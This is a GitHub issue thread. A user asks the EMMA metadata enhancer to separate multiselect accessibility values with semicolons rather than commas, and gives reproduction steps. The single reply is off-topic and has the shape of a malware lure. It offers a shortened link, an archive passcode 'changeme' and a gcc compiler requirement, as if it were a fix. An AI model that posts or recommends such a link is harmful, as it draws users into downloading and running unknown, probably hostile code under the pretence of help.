### ISSUE TITLE
EMMA spreadsheet suggests semicolons as the delineator

### ISSUE THREAD

**Issue by JenM00re** [Swarthmore/emma-metadata-enhancer#11]
Currently, in `content=` piece of the metadata, if you can multiselect, they're separated by commas in the HTML. EMMA's Bulk Upload template suggests semicolons.

**To Reproduce**
1. Go to https://swarthmore.github.io/emma-metadata-enhancer/.
2. fill out required fields.
3. Select multiple options under "Accessibility features", such as "Print page numbers, structural navigation"
4. `<meta name="accessibilityFeatures" content="printPageNumbers,structuralNavigation">`

EMMA is simply asking for semicolons to be used as the separator instead of commas.

**Desktop (please complete the following information):**
 - OS Sonoma 14.6.1
 - Chrome
 - Version 128.0.6613.114 (Official Build) (arm64)

**Comment by yousefsk345** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
